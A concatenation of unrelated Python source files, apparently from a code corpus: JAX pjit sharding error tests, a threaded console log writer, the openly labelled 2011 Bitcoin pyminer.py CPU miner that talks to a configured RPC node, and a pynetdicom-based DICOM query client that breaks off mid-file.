with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedOutResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single out_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2)])
def testInputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=spec, out_axis_resources=None),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testOutputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=None, out_axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit output has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testConstraintShardsXMapAxis(self):
spec = P('x')
f = xmap(lambda x: with_sharding_constraint(x, axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"with_sharding_constraint input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testCatchesInnerXMapErrors(self):
f = pjit(xmap(lambda x, y: x, in_axes=(['i'], ['j']), out_axes=['i', 'j'],
axis_resources={'i': 'x', 'j': 'x'}),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(4)
with self.assertRaises(JAXTypeError):
f(x, x)
def testEmptyMesh(self):
error = (r"pjit requires a non-empty mesh! Are you sure that it's defined "
r"at the call site?")
with self.assertRaisesRegex(RuntimeError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=None)(jnp.arange(4))
@jtu.with_mesh([('x', 2)])
def testAxisResourcesMismatch(self):
x = jnp.ones([])
p = [None, None, None]
pjit(lambda x: x, (p,), p)([x, x, x]) # OK
error = re.escape(
r"pjit in_axis_resources specification must be a tree prefix of the "
r"corresponding value, got specification (None, None, None) for value "
r"tree PyTreeDef((*, *)). Note that pjit in_axis_resources that are "
r"non-trivial pytrees should always be wrapped in a tuple representing "
r"the argument list.")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x, y: x, p, p)(x, x) # Error, but make sure we hint at tupling
# TODO(apaszke): Disable implicit list casts and enable this
# error = re.escape(
# r"pjit in_axis_resources specification must be a tree prefix of the "
# r"corresponding value, got specification (None, None, None) for value "
# r"tree PyTreeDef(([*, *, *],)). Note that pjit in_axis_resources that "
# r"are non-trivial pytrees should always be wrapped in a tuple representing "
# r"the argument list. In particular, you're passing in a single argument "
# r"which means that pjit in_axis_resources might need to be wrapped in a "
# r"singleton tuple.")
# with self.assertRaisesRegex(ValueError, error):
# pjit(lambda x: x, p, p)([x, x, x]) # Error, but make sure we hint at singleton tuple
error = re.escape(
r"pjit out_axis_resources specification must be a tree prefix of the "
r"corresponding value, got specification [[None, None, None], None] for "
r"value tree PyTreeDef([*, *, *]).")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, (p,), [p, None])([x, x, x]) # Error, we raise a generic tree mismatch message
@jtu.with_mesh([('x', 2)])
def testNestedDifferentResources(self):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def f(x):
with mesh(np.array([jax.local_devices()[0]]), ('x')):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def h(x):
return x
return h(x)
xshape = (2, 5, 6)
x = jnp.arange(np.prod(xshape)).reshape(xshape)
with self.assertRaisesRegex(RuntimeError,
"Changing the physical mesh is not allowed.*"):
f(x)
class UtilTest(jtu.JaxTestCase):
def testOpShardingRoundTrip(self):
FakeDevice = namedtuple('FakeDevice', ['id'])
mesh_named_shape = OrderedDict([('a', 2), ('b', 3), ('c', 4), ('d', 7), ('e', 4)])
mesh_axes, mesh_shape = unzip2(mesh_named_shape.items())
devices = [FakeDevice(i) for i in range(np.prod(list(mesh_shape)))]
mesh = pxla.Mesh(np.array(devices).reshape(*mesh_shape), tuple(mesh_axes))
dims = 5
aval = jax.core.ShapedArray((len(devices),) * dims, jnp.float32)
def roundtrip(spec):
op_sharding = pjit_lib.get_aval_sharding_proto(aval, spec, mesh)
parsed_spec = pjit_lib.parse_op_sharding(op_sharding, mesh).partitions
self.assertEqual(parsed_spec[:len(spec)], spec)
self.assertEqual(parsed_spec[len(spec):], ((),) * (len(parsed_spec) - len(spec)))
special_specs = [P()]
for spec in special_specs:
roundtrip(spec)
rng = np.random.default_rng(1)
for i in range(100):
spec = [()] * dims
for axis in rng.permutation(mesh_axes)[:rng.integers(low=1, high=len(mesh_axes) + 1)]:
spec[rng.choice(dims)] += (axis,)
roundtrip(P(*spec))
@parameterized.named_parameters(
("linear", {'x': 0, 'y': 1, 'z': 2}, (('x',), ('y',), ('z',))),
("combine", {'x': 0, 'y': 0, 'z': 1}, (('x', 'y'), ('z',))),
("skip", {'x': 0, 'y': 0, 'z': 2}, (('x', 'y'), None, ('z',))),
("multi_skip", {'x': 0, 'y': 1, 'z': 3}, (('x',), ('y',), None, ('z',))),
)
def test_array_mapping_to_axis_resources(self, inp, expected_out):
self.assertEqual(pxla.array_mapping_to_axis_resources(inp), expected_out)
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
consolelogwriter.py
|
"""The console log writer"""
# -*- coding:utf-8 -*-
import os
import queue
import sys
import threading
import time
import traceback
from .mslogconfig import MsConsoleLogConfig
from .msloglevel import MsLogLevels
from .mslogmsg import MsLogMessage
from .mslogwriter import MsLogWriter
__mutex = threading.RLock()
__instances: dict = {}
def __check_mutex(name: str) -> bool:
"""检查数据库文件互斥锁,若互斥,则返回已有的SqliteConnManager实例,否则返回False"""
if name is None:
raise Exception("Param 'name' for dbfi mutex is None or empty")
with __mutex:
if __instances.__contains__(name):
return __instances[name]
else:
return False
def __add_current_instance(inst, name):
"""将当前实例添加到互斥锁集合"""
if inst is None:
raise Exception("Given param 'inst' is invalid")
with __mutex:
if not __instances.__contains__(name):
__instances[name] = inst
def __remove_current_instance(inst):
"""从互斥锁集合中移除当前实例"""
if inst is None:
raise Exception("Given param 'inst' is invalid")
with __mutex:
if __instances.__contains__(inst.name):
__instances.pop(inst.name, None)
def __singleton(cls):
"""单例"""
# __singleton.__doc__ = cls.__doc__
def _singleton(name: str = None, cfg: MsConsoleLogConfig = None):
""""""
with __mutex:
# check the mutex
mtx_result = __check_mutex(name)
if isinstance(mtx_result, cls):
return mtx_result
inst = cls(name, cfg)
__add_current_instance(inst, name)
return inst
_singleton.__doc__ = cls.__doc__
return _singleton
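# The decorator applied below binds the class name MsConsoleLogWriter to the
# _singleton factory returned above: calling it with a name that is already
# registered returns the existing writer, otherwise a new instance is created
# and registered while the module-level mutex is held.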
@__singleton
class MsConsoleLogWriter(MsLogWriter):
"""The console log writer"""
# # in console logger, all logger share one _real_log_write thread
# __THREAD_STARTED: bool = False
# __THREAD_LOCKER = threading.Lock()
name = None
config = None
# static_initailed: bool = False
# static_locker = threading.RLock()
# # the queue belongs to consolelogwriter class
# _log_queue: queue.Queue = queue.Queue()
def __init__(self, name: str = None, cfg: MsConsoleLogConfig = None):
if (cfg is None) or (not isinstance(cfg, MsConsoleLogConfig)):
cfg = MsConsoleLogConfig(
cfg.level if cfg is not None else MsLogLevels.DEBUG)
MsLogWriter.__init__(self, name, cfg)
self._timeok: bool = False
self._maxwaittime = 1 # second
# self._timeok_locker = threading.RLock()
self._stdwritebuffer_locker = threading.RLock()
self._stdwritebuffer: list = []
self._t_timer = threading.Thread(
target=self._timer_thread, name="tasktimer", daemon=True)
self._t_write = threading.Thread(
target=self._do_real_log_write,
name="cls_{}_{}".format(type(self).__name__, self.name),
args=())
self._t_flush = threading.Thread(
target=self.__flush_thread,
name="cls_flush_{}_{}".format(type(self).__name__, self.name))
def _timer_thread(self, intervalsec: float = 0.1):
"""定时器,定时分配任务。\n
intervalsec: 轮询间隔,单位秒,默认0.1"""
if not type(intervalsec) in [int, float]:
raise Exception("Timer param inverval sec type wrong.")
if intervalsec < 0 or intervalsec > 10:
intervalsec = 0.1
elapsed: float = 0
while True:
try:
if elapsed >= self._maxwaittime:
self._timeok = True
elapsed = 0
except Exception:
print(
"Task dispatcher timer error: %s" % traceback.format_exc())
finally:
time.sleep(intervalsec)
# While timeok is True, no dispatch has been completed since timeok was last
# set to True, so the elapsed time does not increase
if not self._timeok:
elapsed += intervalsec
def __enter__(self):
pass
def __exit__(self, exc_type, exc_value, traceback):
pass
def _enqueue_msg(self, msmsg: MsLogMessage):
"""Enqueue the message object to queue"""
self._log_queue.put(msmsg)
def _start_thread(self):
"""start one writing thread"""
if self._thread_started:
return
with self._t_start_locker:
if self._thread_started:
return
self._t_timer.start()
self._t_write.start()
# self._t_flush.start()
if self.config.debug:
tdebug = threading.Thread(target=self._debug_log)
tdebug.start()
self._thread_started = True
def _debug_log(self):
while True:
try:
print('{} {}:{}'.format(self._t_write.name, self.name,
self._log_queue.qsize()))
except Exception:
traceback.print_exc()
finally:
time.sleep(10)
def _do_real_log_write(self):
"""The log write thread. The subclass implementation should do the
real log write"""
got = False
while True:
try:
got = False
msg = self._log_queue.get(timeout=3)
got = True
# save a bit of performance... skip this check for now
# if not isinstance(msg, MsLogMessage):
# print("invalid MsLogMessage object: {}".format(msg))
# continue
if self._do_real_log_write_sub(msg):
self._on_succeed()
else:
self._on_failed()
except queue.Empty:
continue
except Exception:
traceback.print_exc()
finally:
if got:
self._log_queue.task_done()
def _do_real_log_write_sub_(self, msg: MsLogMessage):
"""do the real log writing action"""
self._stdwritebuffer.append(msg.message)
if not self._timeok and len(self._stdwritebuffer) < 500:
return
try:
# sys.stdout.write(self._stdwritebuffer)
# print(len(self._stdwritebuffer))
sys.stdout.write('\n'.join(self._stdwritebuffer))
self._stdwritebuffer.clear()
# sys.stdout.writelines('{}\n'.format(msg.message))
# print(msg.message)
#print("console:" + str(cls._log_queue.empty()))
except Exception:
traceback.print_exc()
finally:
# with self._timeok_locker:
if self._timeok:
self._timeok = False
def _do_real_log_write_sub(self, msg: MsLogMessage):
"""do the real log writing action"""
# with self._stdwritebuffer_locker:
# self._stdwritebuffer.append(msg.message)
# if not self._timeok and len(self._stdwritebuffer) < 500:
# return
try:
# with self._stdwritebuffer_locker:
# tmp = '\n'.join(self._stdwritebuffer)
# sys.stdout.write(tmp+'\n')
# self._stdwritebuffer.clear()
print(msg.message)
# sys.stdout.write(self._stdwritebuffer)
# print(len(self._stdwritebuffer))
# sys.stdout.writelines('{}\n'.format(msg.message))
# print(msg.message)
# print("console:" + str(cls._log_queue.empty()))
except Exception:
traceback.print_exc()
finally:
# with self._timeok_locker:
if self._timeok:
self._timeok = False
def __flush_thread(self):
"""Flush per 0.5 seconds"""
while True:
try:
# sys.stdout.flush()
continue
except Exception:
traceback.print_exc()
finally:
time.sleep(2)
def _on_succeed(self):
pass
def _on_failed(self):
pass
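# Hedged usage sketch (not part of the original module): repeated construction with
# the same name yields the same writer instance. The MsConsoleLogConfig signature is
# inferred from __init__ above and is an assumption.
def _example_singleton_usage():
    writer_a = MsConsoleLogWriter("console", MsConsoleLogConfig(MsLogLevels.DEBUG))
    writer_b = MsConsoleLogWriter("console")
    assert writer_a is writer_b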
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
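# Note on the helpers above (assuming the usual getwork semantics): bufreverse swaps
# the byte order inside every 32-bit word and wordreverse reverses the order of the
# 32-bit words in the buffer; together they convert between the hex layout returned
# by the getwork RPC and the byte order used for the double SHA-256 hashing below.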
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
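# Illustrative CONFIG-FILE contents (key=value lines parsed by the loop below; the
# credential values are placeholders):
#   host=127.0.0.1
#   port=7168
#   rpcuser=someuser
#   rpcpass=somepassword
#   threads=2
#   scantime=30
#   hashmeter=1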
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 7168
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
dicom.py
|
# -*- coding: utf-8 -*-
"""
There are two types of AEs:
* SCP (Service Class Provider) which can be thought of as a server
* SCU (Service Class User) as a client.
CHANGELOG
=========
0.1.2 / 2021-05-19
------------------
- change debug messages
0.1.1 / 2021-04-27
------------------
- enables dicom calls via pynetdicom
0.1.0 / 2021-01-16
------------------
- First Release
"""
__author__ = "R. Bauer"
__copyright__ = "MedPhyDO - Machbarkeitsstudien des Instituts für Medizinische Strahlenphysik und Strahlenschutz am Klinikum Dortmund im Rahmen von Bachelor und Masterarbeiten an der TU-Dortmund / FH-Dortmund"
__credits__ = ["R.Bauer", "K.Loot"]
__license__ = "MIT"
__version__ = "0.1.2"
__status__ = "Prototype"
import os
import os.path as osp
import json
from typing import List
from blinker import signal
import threading
import queue
from pydicom.dataset import Dataset
from pydicom import dcmread
from pydicom.uid import generate_uid
from pynetdicom import (
AE,
debug_logger,
build_role,
evt,
AllStoragePresentationContexts,
ALL_TRANSFER_SYNTAXES,
QueryRetrievePresentationContexts
)
# which capabilities the classes should provide
from pynetdicom.sop_class import (
PatientRootQueryRetrieveInformationModelFind,
PatientRootQueryRetrieveInformationModelMove,
PatientRootQueryRetrieveInformationModelGet,
StudyRootQueryRetrieveInformationModelFind,
StudyRootQueryRetrieveInformationModelMove,
StudyRootQueryRetrieveInformationModelGet,
PatientStudyOnlyQueryRetrieveInformationModelFind,
PatientStudyOnlyQueryRetrieveInformationModelMove,
PatientStudyOnlyQueryRetrieveInformationModelGet,
CTImageStorage,
RTImageStorage,
XRayRadiationDoseSRStorage,
SecondaryCaptureImageStorage # CT-summary
)
from pynetdicom import sop_class
#debug_logger()
import logging
logger = logging.getLogger( "MQTT" )
#logger.level = 10 # 0 - NOTSET, 10 - DEBUG, 20 - INFO, 30 - WARNING, 40 - ERROR, 50 - CRITICAL
# Defaults for the query results; these are tiered, IMAGE includes all preceding levels
#
dicomQueryDefaults = {
"PATIENT": {
"QueryRetrieveLevel": "PATIENT",
"PatientID": "*",
"PatientName": None,
"PatientBirthDate": None,
},
"STUDY": {
"QueryRetrieveLevel": "STUDY",
"StudyInstanceUID": None,
"StudyID": None,
"StudyDate": None,
"StudyTime": None,
"Modality": None,
"StudyDescription": None,
"AccessionNumber": None
},
"SERIES": {
"QueryRetrieveLevel": "SERIES",
"SeriesInstanceUID": None,
"Modality": None,
"SeriesNumber": None,
"StationName": None,
},
"IMAGE": {
"QueryRetrieveLevel": "IMAGE",
"SOPClassUID": None,
"SOPInstanceUID": None,
"StationName": None,
"InstanceNumber": None,
"ManufacturerModelName": None,
"ProtocolName": None,
"ExposureTime": None,
"KVP": None,
"ContentDate": None,
"ContentTime": None,
"XRayTubeCurrent": None
}
}
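# Hedged sketch (not part of the original module): one way the tiered defaults above
# could be merged into a single pydicom Dataset for a C-FIND query. The helper name
# and its use are illustrative assumptions only.
def _example_query_dataset(level: str = "SERIES") -> Dataset:
    """Merge all default levels up to and including `level` into one query Dataset."""
    order = ["PATIENT", "STUDY", "SERIES", "IMAGE"]
    ds = Dataset()
    for lvl in order[: order.index(level) + 1]:
        for keyword, value in dicomQueryDefaults[lvl].items():
            # unknown values are sent as empty strings so the SCP can fill them in
            setattr(ds, keyword, "" if value is None else value)
    ds.QueryRetrieveLevel = level
    return ds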
class ispDicom( ):
"""Dicom Klasse zum Abfragen eines Dicom servers.
Attributes
----------
dicomPath : str
Pfad zu den Dicom Dateien
server : str
Der zu verwendende DICOM Server aus config.json
ae : AE
Application Entity
assoc : <associate>
Die Verbindung zum Dicom Server Subklasse von threading.Thread
scp :
Der server zum empfangen der Daten
override: bool
Dicomfiles neu anlegen
messageId : int
id der laufenden abfrage
"""
def __init__( self, server="VMSDBD", config=None ):
"""Klasse initialisieren
Sicherstellen das in dicomPath ein gültiger Pfad liegt
query_model::
- ``P`` - Patient Root Information Model
- ``S`` - Study Root Information Model
- ``O`` - Patient Study Only Information Model
"""
# class defaults
self.dicomPath: str = None
self.server: str = None
self.ae: AE = None
self.implementation_class_uid = generate_uid()
self.supported_context: List[str] = [
sop_class.RTImageStorage,
sop_class.XRayRadiationDoseSRStorage,
sop_class.SecondaryCaptureImageStorage,
sop_class.CTImageStorage,
]
self.assoc = None
self.request_mode = "c_move" # c_get
self.request_query_model = "S"
self.scp = None
self.override: bool = False
self.subPath: str = ""
self.messageId = 0
# use the given configuration or read it; it is available in self.config
if config:
self.config = config
self.server=server
self.initialized = False
# provide the path to the DICOM files, default: {{BASE_DIR}}/files/DICOM
self.dicomPath = str( self.config.get( ["dicom", self.server, "local_dir"], "", replaceVariables=True ) )
if self.dicomPath == "": # pragma: no cover
self.dicomPath = os.path.abspath( osp.join( str(self.config.BASE_DIR), "files", "dicom" ) )
self.config.dicom[self.server]["local_dir"] = self.dicomPath
if not os.path.isdir(self.dicomPath): # pragma: no cover
logger.debug('dicomClass.initAE: creating dirname={}'.format( self.dicomPath ) )
try:
os.makedirs( self.dicomPath )
except (OSError, IOError) as e: # pragma: no cover
msg = 'dicomClass.initAE: error while creating: {}'.format( self.dicomPath )
logger.error( msg )
self.appError( msg, e )
if os.access(self.dicomPath, os.W_OK) is True:
self.initialized = True
else: # pragma: no cover
msg = 'dicomClass.initAE: no write permission on: {}'.format( self.dicomPath )
logger.error( msg )
self.appError( msg )
def __del__(self):
"""Deleting Class (Calling destructor)
"""
self.closeAE()
def initAE( self ):
"""Application Entity bereitstellen
Status Codes: Non-service specific - 0xC000 to 0xC0FF
Verwendete evt_handlers::
* EVT_ESTABLISHED
* EVT_REJECTED
* EVT_RELEASED
Returns
-------
status : hex
- 0x0000 - alles OK
- 0xC0FF -Verbindung fehlgeschlagen
"""
# close any existing one first, just to be safe
self.closeAE()
# Initialise the Application Entity
assoc = None
try:
# Initialise the Application Entity
aet = self.config.dicom[self.server]["aet"]
self.ae = AE( ae_title=aet )
# use patient search
self.ae.requested_contexts = QueryRetrievePresentationContexts
# patient level
self.ae.add_requested_context( PatientRootQueryRetrieveInformationModelFind )
self.ae.add_requested_context( PatientRootQueryRetrieveInformationModelMove )
self.ae.add_requested_context( PatientRootQueryRetrieveInformationModelGet )
# Study level
self.ae.add_requested_context( StudyRootQueryRetrieveInformationModelFind )
self.ae.add_requested_context( StudyRootQueryRetrieveInformationModelMove )
self.ae.add_requested_context( StudyRootQueryRetrieveInformationModelGet )
# patientStudyOnly
self.ae.add_requested_context( PatientStudyOnlyQueryRetrieveInformationModelFind )
self.ae.add_requested_context( PatientStudyOnlyQueryRetrieveInformationModelMove )
self.ae.add_requested_context( PatientStudyOnlyQueryRetrieveInformationModelGet )
# Add the requested presentation context (Storage SCP)
self.ae.add_requested_context( CTImageStorage )
self.ae.add_requested_context( XRayRadiationDoseSRStorage )
# use all Storages and Transfers
storage_sop_classes = [
cx.abstract_syntax for cx in AllStoragePresentationContexts
]
for uid in storage_sop_classes:
self.ae.add_supported_context(uid, ALL_TRANSFER_SYNTAXES)
# the handlers do not check for EVT_REJECTED, since being offline is a valid state
handlers=[
( evt.EVT_ESTABLISHED , self.handle_EVENT),
#( evt.EVT_REJECTED , self.handle_event),
( evt.EVT_RELEASED, self.handle_EVENT),
# for send_c_get
( evt.EVT_C_STORE, self.handle_STORE),
]
# set the request mode for the server: c_move or c_get
self.request_mode = self.config.get( ["dicom", self.server, "request_mode"], "c_move" )
# set the request_query_model for the server: P - patient, S - study, O - patient study only
self.request_query_model = self.config.get( ["dicom", self.server, "request_query_model"], "S" )
# Create an SCP/SCU Role Selection Negotiation item for CT Image Storage
roles = []
roles.append( build_role(CTImageStorage, scp_role=True, scu_role=True ) )
roles.append( build_role(XRayRadiationDoseSRStorage, scp_role=True, scu_role=True) )
# Associate with peer AE
assoc = self.ae.associate(
self.config.dicom[self.server]['server_ip'],
self.config.dicom[self.server]['server_port'],
ae_title=self.config.dicom[self.server]['aec'],
evt_handlers=handlers,
ext_neg=roles
)
except: # pragma: no cover
pass
self.assoc = None
status = 0xC0FF
if assoc and assoc.is_established:
self.assoc = assoc
status = 0x0000
logger.debug('dicomClass.initAE: connection established')
else: # pragma: no cover
logger.warning('dicomClass.initAE: Association rejected, aborted or never connected')
return status
def _start_server(self, evt_name:str="EVT_C_STORE"):
# EVT_C_STORE or EVT_C_FIND
# establish the connection if necessary
if not self.assoc:
status = self.initAE()
# and check it
if not self.assoc: # pragma: no cover
logger.warning("dicomClass._start_server: connection failed")
signal( 'dicom.{}'.format( evt_name ) ).send( {
"name": evt_name,
'_is_cancelled': True,
"status": status,
"msg" : "initAE: connection failed",
# "dataset": None,
} )
return status
# if not already done, start the server that receives the data
if not self.scp:
# reset the message id
self.messageId = 0
#print( self.scp )
# provide handlers for receiving the data
handlers = [
( evt.EVT_C_STORE, self.handle_STORE),
( evt.EVT_ACCEPTED, self.handle_EVENT),
( evt.EVT_ABORTED, self.handle_EVENT),
( evt.EVT_REJECTED, self.handle_EVENT),
( evt.EVT_RELEASED, self.handle_EVENT),
( evt.EVT_REQUESTED, self.handle_EVENT),
( evt.EVT_DIMSE_SENT, self.handle_EVENT),
( evt.EVT_DIMSE_RECV, self.handle_EVENT),
]
# start the server that receives the data: storage SCP on port listen_port
self.ae.ae_title = self.config.dicom[self.server]['aet']
sig_msg = None
try:
logger.debug( "dicomClass._start_server: start server" )
# If set to non-blocking then a running ``ThreadedAssociationServer``
# instance will be returned. This can be stopped using ``shutdown()``.
self.scp = self.ae.start_server(
('', self.config.dicom[self.server]['listen_port']),
block=False, # non-blocking; events are handled via the thread handlers
evt_handlers=handlers
)
except OSError as e: # pragma: no cover
#print( "dicomClass.retrieve: 0xC515 - {}".format( str(e) ) )
logger.error( "dicomClass._start_server: 0xC515 - {}".format( str(e) ) )
sig_msg = {
"name": evt_name,
"_is_cancelled": True,
"status": 0xC515,
"msg" : "{}".format( str(e) )
}
except: # pragma: no cover
logger.error( "dicomClass._retrieve: ERROR start listen server" )
sig_msg = {
"name": evt_name,
"_is_cancelled": True,
"status": 0xC515,
"msg" : "Fehler bei start listen server"
}
# send signal on error
if sig_msg is not None:
signal( 'dicom.{}'.format( evt_name ) ).send( sig_msg )
return 0xC515
return 0x0000
def closeAE( self, status=0x0000 ):
"""shutdown scp und Release association.
Parameters
----------
status : int, optional
Grund des closeAE mitgeben. The default is 0x0000.
Returns
-------
None.
"""
done = {
"scp": "",
"assoc": "",
"ae": "",
}
do = 0
# shut down the SCP (receiving side)
if self.scp:
self.scp.shutdown()
self.scp = None
done["scp"] = "shutdown()"
do += 1
# release assoc
if self.assoc:
self.assoc.release()
self.assoc = None
done["assoc"] = "release()"
do += 1
# shutdown ae
if self.ae:
self.ae.shutdown()
self.ae = None
done["ae"] = "shutdown()"
do += 1
if do > 0:
logger.debug('dicomClass.closeAE: {}'.format( json.dumps( done ) ) )
return done
def getInfo( self ):
"""Wie print( self.ae ) gibt aber ein object zurück
Returns
-------
obj : dict
dict mit Server Informationen.
"""
obj = {
"dicomPath": self.dicomPath
}
if self.ae:
obj["title"] = self.ae.ae_title
obj["active_associations"] = len(self.ae.active_associations)
obj["maximum_associations"] = self.ae.maximum_associations
obj["acse_timeout"] = self.ae.acse_timeout
obj["dimse_timeout"] = self.ae.dimse_timeout
obj["network_timeout"] = self.ae.network_timeout
obj["associations"] = []
for assoc in self.ae.active_associations:
associations = {
"ae_title" : assoc.remote['ae_title'],
"address" : assoc.remote['address'],
"port" : assoc.remote['port'],
"accepted_contexts" : []
}
for cx in assoc.accepted_contexts:
#print( "cx", cx )
associations["accepted_contexts"].append( {
